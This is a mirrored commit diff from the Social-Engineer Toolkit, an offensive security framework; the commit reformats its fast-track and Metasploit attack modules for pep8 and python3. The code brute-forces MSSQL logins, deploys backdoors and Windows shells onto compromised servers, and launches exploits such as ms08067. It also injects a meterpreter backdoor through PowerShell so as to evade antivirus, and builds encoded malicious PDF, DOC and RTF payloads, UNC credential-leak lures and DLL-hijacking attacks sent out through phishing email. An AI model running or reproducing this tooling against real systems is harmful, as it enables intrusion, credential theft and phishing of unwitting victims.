Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-12-14 15:02:33 +00:00
Code Issues Projects Releases Packages Wiki Activity

pep8 and python3 refactoring

Browse source
This commit is contained in:
TrustedSec 2016-01-14 15:59:31 -05:00
parent 262fe6ffed
commit 723613f3ea
5 changed files with 457 additions and 344 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

273
src/core/fasttrack.py
View file

@ -33,49 +33,63 @@ try:
# take input here
attack_vector_sql = raw_input(setprompt(["19", "21"], ""))
#
# option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
print("\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
if choice != "1":
if choice != "2":
if choice != "":
print_error("You did not specify 1 or 2! Please try again.")
choice =raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
print_error(
"You did not specify 1 or 2! Please try again.")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address
if choice == "": choice = "1"
if choice == "":
choice = "1"
if choice == "1":
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
if choice == "2":
while 1:
range = raw_input(setprompt(["19","21","22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
range = raw_input(setprompt(
["19", "21", "22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
if not os.path.isfile(range):
print_error("File not found! Please type in the path to the file correctly.")
print_error(
"File not found! Please type in the path to the file correctly.")
else:
break
if choice == "1": port = "1433"
if choice == "2": port = "1433"
if choice == "1":
port = "1433"
if choice == "2":
port = "1433"
# ask for a wordlist
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "": wordlist = "default"
wordlist = raw_input(setprompt(
["19", "21", "22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "":
wordlist = "default"
# specify the user to brute force
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
username = raw_input(setprompt(
["19", "21", "22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
# default to sa
if username == "": username = "sa"
if username == "":
username = "sa"
if username != "sa":
if not os.path.isfile(username):
print_status("If you were using a file, its not found, using text as username.")
print_status(
"If you were using a file, its not found, using text as username.")
# import the mssql module from fasttrack
from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot
if choice != "2":
# sql_servers
sql_servers = ''
print_status("Hunting for SQL servers.. This may take a little bit.")
print_status(
"Hunting for SQL servers.. This may take a little bit.")
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
@ -84,7 +98,8 @@ try:
if sqlport != None:
sql_servers = sql_servers + host + ":" + sqlport + ","
else:
# use udp discovery to get the SQL server IDP through 1434
# use udp discovery to get the SQL server IDP through
# 1434
sqlport = get_sql_port(range)
# UDP could be closed - defaulting to 1433
if sqlport != None:
@ -94,10 +109,13 @@ try:
if choice == "2":
if not os.path.isfile(range):
while 1:
print_warning("Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
print_warning(
"Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range):
print_status("Atta boy. Found the file this time. Moving on.")
print_status(
"Atta boy. Found the file this time. Moving on.")
break
fileopen = file(range, "r").readlines()
@ -122,13 +140,17 @@ try:
# start loop and brute force
for servers in sql_servers:
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
# this will return the following format ipaddr + "," +
# username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(servers, username, port, wordlist)
sql_success = mssql.brute(
servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break into this to the above with a newline to be parsed later
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + sql_success + ":"
counter = 1
@ -136,16 +158,20 @@ try:
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(servers, users, port, wordlist)
# we wont break out of the loop here incase theres multiple usernames we want to find
sql_success = mssql.brute(
servers, users, port, wordlist)
# we wont break out of the loop here incase
# theres multiple usernames we want to find
if sql_success != False:
master_list = master_list + sql_success + ":"
counter = 1
# if we didn't successful attack one
if counter == 0:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input("Press {return} to continue to the main menu.")
print_warning(
"Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input(
"Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
@ -154,23 +180,29 @@ try:
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status("Select the compromise SQL server you want to interact with:\n")
print_status(
"Select the compromise SQL server you want to interact with:\n")
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
print " " + str(counter) + ". " + success
success = bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[
3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
print(" " + str(counter) + ". " + success)
# increment counter
counter = counter + 1
print "\n 99. Return back to the main menu.\n"
print("\n 99. Return back to the main menu.\n")
# select the server to interact with
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
select_server = raw_input(
setprompt(["19", "21", "22"], "Select the SQL server to interact with [1]"))
# default 1
if select_server == "quit" or select_server == "exit": break
if select_server == "": select_server = "1"
if select_server == "99": break
if select_server == "quit" or select_server == "exit":
break
if select_server == "":
select_server = "1"
if select_server == "99":
break
counter = 1
for success in master_names:
if success != "":
@ -179,22 +211,30 @@ try:
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
if option == "": option = "1"
print("\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
option = raw_input(
setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
if option == "":
option = "1"
# if 99 then break
if option == "99": break
# specify we are using the fasttrack option, this disables some features
filewrite = file(setdir + "/fasttrack.options", "w")
if option == "99":
break
# specify we are using the fasttrack
# option, this disables some features
filewrite = file(
setdir + "/fasttrack.options", "w")
filewrite.write("none")
filewrite.close()
# import fasttrack
if option == "1":
# import payloads for selection and prep
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3])
# import payloads for selection and
# prep
mssql.deploy_hex2binary(
success[0], success[2], success[1], success[3])
# straight up connect
if option == "2":
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
mssql.cmdshell(success[0], success[2], success[
1], success[3], option)
# increment counter
counter = counter + 1
@ -202,51 +242,59 @@ try:
# if we want to connect directly to a SQL server
#
if attack_vector_sql == "2":
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
if sql_port == "": sql_port = "1433"
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
sql_server = raw_input(setprompt(
["19", "21", "23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(
setprompt(["19", "21", "23"], "Enter the SQL port to connect [1433]"))
if sql_port == "":
sql_port = "1433"
sql_username = raw_input(
setprompt(["19", "21", "23"], "Enter the username of the SQL Server [sa]"))
# default to sa
if sql_username == "": sql_username = "sa"
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
if sql_username == "":
sql_username = "sa"
sql_password = raw_input(
setprompt(["19", "21", "23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
import _mssql
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
conn = _mssql.connect(
sql_server + ":" + str(sql_port), sql_username, sql_password)
counter = 1
except Exception, e:
print e
except Exception as e:
print(e)
print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
print_status("Dropping into a SQL shell. Type quit to exit.")
print_status(
"Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
print_status("Exiting the SQL shell and returning to menu.")
print_status(
"Exiting the SQL shell and returning to menu.")
break
try:
# execute the query
sql_query = conn.execute_query(sql_shell)
# return results
print "\n"
print("\n")
for data in conn:
data = str(data)
data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n")
data = data.replace("{0: '", "")
data = data.replace("'}", "")
print data
except Exception, e:
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
print(data)
except Exception as e:
print_warning(
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
##################################
##################################
@ -255,36 +303,50 @@ try:
##################################
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
create_menu(text.fasttrack_exploits_text1,
text.fasttrack_exploits_menu1)
# enter the exploits menu here
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
range = raw_input(
setprompt(["19", "24"], "Select the number of the exploit you want"))
# ms08067
if range == "1":
try: reload(src.fasttrack.exploits.ms08067)
except: import src.fasttrack.exploits.ms08067
try:
reload(src.fasttrack.exploits.ms08067)
except:
import src.fasttrack.exploits.ms08067
# firefox 3.6.16
if range == "2":
try: reload(src.fasttrack.exploits.firefox_3_6_16)
except: import src.fasttrack.exploits.firefox_3_6_16
try:
reload(src.fasttrack.exploits.firefox_3_6_16)
except:
import src.fasttrack.exploits.firefox_3_6_16
# solarwinds
if range == "3":
try: reload(src.fasttrack.exploits.solarwinds)
except: import src.fasttrack.exploits.solarwinds
try:
reload(src.fasttrack.exploits.solarwinds)
except:
import src.fasttrack.exploits.solarwinds
# rdp DoS
if range == "4":
try: reload(src.fasttrack.exploits.rdpdos)
except: import src.fasttrack.exploits.rdpdos
try:
reload(src.fasttrack.exploits.rdpdos)
except:
import src.fasttrack.exploits.rdpdos
if range == "5":
try: reload(src.fasttrack.exploits.mysql_bypass)
except: import src.fasttrack.exploits.mysql_bypass
try:
reload(src.fasttrack.exploits.mysql_bypass)
except:
import src.fasttrack.exploits.mysql_bypass
if range == "6":
try: reload(src.fasttrack.exploits.f5)
except: import src.fasttrack.exploits.f5
try:
reload(src.fasttrack.exploits.f5)
except:
import src.fasttrack.exploits.f5
##################################
##################################
@ -293,9 +355,10 @@ try:
##################################
if attack_vector == "3":
# load sccm attack
try: reload(src.fasttrack.sccm.sccm_main)
except: import src.fasttrack.sccm.sccm_main
try:
reload(src.fasttrack.sccm.sccm_main)
except:
import src.fasttrack.sccm.sccm_main
##################################
##################################
@ -304,8 +367,8 @@ try:
##################################
if attack_vector == "4":
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
subprocess.Popen("python %s/src/fasttrack/delldrac.py" %
(definepath), shell=True).wait()
##################################
##################################
@ -321,13 +384,16 @@ try:
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
""")
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
print "\n"
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
print("\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
print("\n")
ipaddr = raw_input(
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
break
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
print_status(
"Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(
["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one
if dict == "":
# write out a file
@ -343,20 +409,29 @@ try:
dict = ""
if dict != "":
print_warning("You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
print_warning(
"You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(
setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no":
print_status("Okay. Not brute forcing user accounts *phew*.")
print_status(
"Okay. Not brute forcing user accounts *phew*.")
dict = ""
# next we see what rid we want to start
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "": start_rid = "500"
start_rid = raw_input(
setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "":
start_rid = "500"
# stop rid
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "": stop_rid = "15000"
print_status("Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
stop_rid = raw_input(
setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "":
stop_rid = "15000"
print_status(
"Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" %
(ipaddr, start_rid, stop_rid, dict), shell=True).wait()
# once we are finished, prompt.
print_status("Everything is finished!")
@ -368,9 +443,11 @@ try:
##################################
##################################
if attack_vector == "6":
print "\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n"
try: reload(src.fasttrack.psexec)
except: import src.fasttrack.psexec
print("\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
try:
reload(src.fasttrack.psexec)
except:
import src.fasttrack.psexec
# handle keyboard exceptions
except KeyboardInterrupt:

13
src/core/module_handler.py
View file

@ -1,6 +1,6 @@
#!/usr/bin/env python
## module_handler.py
# module_handler.py
import glob
import re
@ -14,9 +14,10 @@ menu_return = "false"
counter = 0
# get the menu going
print "\n"
print("\n")
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n")
print_info_spaces(
"Please read the readme/modules.txt for information on how to create your own modules.\n")
for name in glob.glob("modules/*.py"):
@ -30,9 +31,9 @@ for name in glob.glob("modules/*.py"):
line = line.replace('MAIN="', "")
line = line.replace('"', "")
line = " " + str(counter) + ". " + line
print line
print(line)
print "\n 99. Return to the previous menu\n"
print("\n 99. Return to the previous menu\n")
choice = raw_input(setprompt(["9"], ""))
if choice == 'exit':
@ -76,6 +77,6 @@ if menu_return == "false":
try:
exec("%s.main()" % (name))
# handle the exception if main isn't there
except Exception, e:
except Exception as e:
raw_input(" [!] There was an issue with a module: %s." % (e))
return_continue()

112
src/core/msf_attacks/create_payload.py
View file

@ -1,5 +1,5 @@
#!/usr/bin/python
## PDF spear phishing attack here
# PDF spear phishing attack here
import subprocess
import re
@ -20,7 +20,7 @@ users_home = os.getenv("HOME")
# metasploit path
meta_path = meta_path()
print meta_path
print(meta_path)
# define if we need apache or not for dll hijacking
# define if use apache or not
@ -44,7 +44,8 @@ for line in apache_check:
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
if os.path.isdir(apache_path + "/html"): apache_path = apache_path + "/html"
if os.path.isdir(apache_path + "/html"):
apache_path = apache_path + "/html"
###################################################
# USER INPUT: SHOW PAYLOAD MENU #
@ -54,9 +55,10 @@ target=""
exploit = "INVALID"
while exploit == "INVALID":
debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5)
show_payload_menu1 = create_menu(create_payloads_text, create_payloads_menu)
show_payload_menu1 = create_menu(
create_payloads_text, create_payloads_menu)
exploit = raw_input(setprompt(["4"], ""))
print "\n"
print("\n")
# Do conditional checks for the value of 'exploit', which should be a number
# Handle any additional tasks before doing the dictionary lookup and
@ -67,12 +69,14 @@ while exploit == "INVALID":
exit_set()
if exploit == "":
exploit='1' # 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
# 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
exploit = '1'
if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
outfile = ("template.doc")
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
# 'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
if exploit == '4':
outfile = ("template.rtf")
target = ("TARGET=1")
@ -82,22 +86,23 @@ while exploit == "INVALID":
if exploit != '3' and exploit != '4' and exploit != "17":
outfile = ("template.pdf")
debug_msg(me, 'current input was read as: %s' % exploit, 3)
exploit = ms_attacks(exploit)
debug_msg(me, 'value was translated to: %s' % exploit, 3)
if exploit == "INVALID":
print_warning("that choice is invalid...please try again or press ctrl-c to Cancel.")
print_warning(
"that choice is invalid...please try again or press ctrl-c to Cancel.")
time.sleep(2)
# 'exploit' has been converted to the string by now, so we need to
# evaluate the string instead of the user input number from here on...
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
print_info("Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print """
print_info(
"Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print("""
1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack\n"""
2. Use built-in BLANK PDF for attack\n""")
choicepdf = raw_input(setprompt(["4"], ""))
@ -106,7 +111,8 @@ if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit ==
if choicepdf == '1':
# define if user wants to use their own pdf or built in one
inputpdf=raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
inputpdf = raw_input(
setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
# if blank, then default to normal pdf
if inputpdf == "":
# change to default SET pdf
@ -141,13 +147,13 @@ if exploit_counter == 0:
if payload == 'exit':
exit_set()
if payload == "" : payload="2"
if payload == "":
payload = "2"
if payload == '4' or payload == '5' or payload == '6':
noencode = 1
payload = ms_payload_3(payload)
# imported from central, grabs ip address
rhost = grab_ipaddress()
@ -179,18 +185,22 @@ if exploit_counter == 0:
os.remove(msfpath + "local/template.pdf")
filewrite = file(setdir + "/template.rc", "w")
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" % (rhost,lport,inputpdf,output))
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" %
(rhost, lport, inputpdf, output))
filewrite.close()
child = pexpect.spawn("%smsfconsole -r %s/template.rc" % (meta_path, setdir))
child = pexpect.spawn(
"%smsfconsole -r %s/template.rc" % (meta_path, setdir))
a = 1
while a == 1:
if os.path.isfile(setdir + "/template.pdf"):
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir),
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
a = 2 # break
else:
print_status("Waiting for payload generation to complete...")
if os.path.isfile(msfpath + "local/" + outfile):
subprocess.Popen("cp %slocal/%s %s" % (msfpath, outfile,setdir), shell=True)
subprocess.Popen("cp %slocal/%s %s" %
(msfpath, outfile, setdir), shell=True)
time.sleep(3)
print_status("Payload creation complete.")
@ -205,13 +215,17 @@ if exploit_counter == 0:
if noencode == 1:
execute1 = ("exe")
payloadname = ("vb.exe")
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True)
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
(meta_path, payload, rhost, lport, execute1, setdir, payloadname), shell=True)
if noencode == 0:
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True)
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
(meta_path, setdir, setdir), shell=True)
# Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % (meta_path,setdir,setdir), shell=True)
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
(meta_path, setdir, setdir), shell=True)
print_info("Raring the VBS file.")
subprocess.Popen("rar a %s/template.rar %s/template.vbs" % (setdir,setdir), shell=True)
subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
(setdir, setdir), shell=True)
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
filewrite = file(setdir + "/payload.options", "w")
@ -221,13 +235,17 @@ if exploit_counter == 0:
if not os.path.isfile(setdir + "/fileformat.file"):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: reload(smtp_client)
except: import smtp_client
try:
reload(smtp_client)
except:
import smtp_client
# start the unc_embed attack stuff here
if exploit == "unc_embed":
rhost = grab_ipaddress
import string,random
import string
import random
def random_string(minlength=6, maxlength=15):
length = random.randint(minlength, maxlength)
letters = string.ascii_letters + string.digits
@ -238,24 +256,31 @@ if exploit == "unc_embed":
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
filewrite = file(setdir + "/template.doc", "w")
filewrite.write(r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' %(rhost,rand_gen))
filewrite.write(
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
filewrite.close()
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: reload(smtp_client)
except: import smtp_client
try:
reload(smtp_client)
except:
import smtp_client
# start the dll_hijacking stuff here
if exploit == "dll_hijacking":
sys.path.append("src/core/payloadgen")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try: reload(create_payloads)
except: import create_payloads
try:
reload(create_payloads)
except:
import create_payloads
sys.path.append("src/webattack/dll_hijacking")
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1)
try: reload(hijacking)
except: import hijacking
try:
reload(hijacking)
except:
import hijacking
# if we are not using apache
if apache == 0:
@ -268,31 +293,37 @@ if exploit == "dll_hijacking":
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
time.sleep(1)
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child = pexpect.spawn("python src/html/web_server.py")
# except: child.close()
# if we are using apache
if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
(apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"):
# if we aren't using the infectious method then do normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)):
print_info("This may take a few to load MSF...")
try:
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir))
child1 = pexpect.spawn(
"%smsfconsole -L -r %s/meta_config" % (meta_path, setdir))
except:
try:
child1.close()
except: pass
except:
pass
# get the emails out
# if we aren't using the infectious method then do the normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: reload(smtp_client)
except: import smtp_client
try:
reload(smtp_client)
except:
import smtp_client
try:
child1.interact()
except:
@ -300,4 +331,5 @@ if exploit == "dll_hijacking":
try:
child.close()
child1.close()
except: pass
except:
pass

13
src/core/msf_attacks/msf_list.py
View file

@ -8,8 +8,11 @@ me = mod_name()
sys.path.append("src/core")
debug_msg(me, "re-importing 'src.core.setcore'", 1)
try: reload(setcore)
except: import setcore
print "[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]"
generate_list=subprocess.Popen("%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
print "[---] Database is now up-to-date [---]"
try:
reload(setcore)
except:
import setcore
print("[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]")
generate_list = subprocess.Popen(
"%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
print("[---] Database is now up-to-date [---]")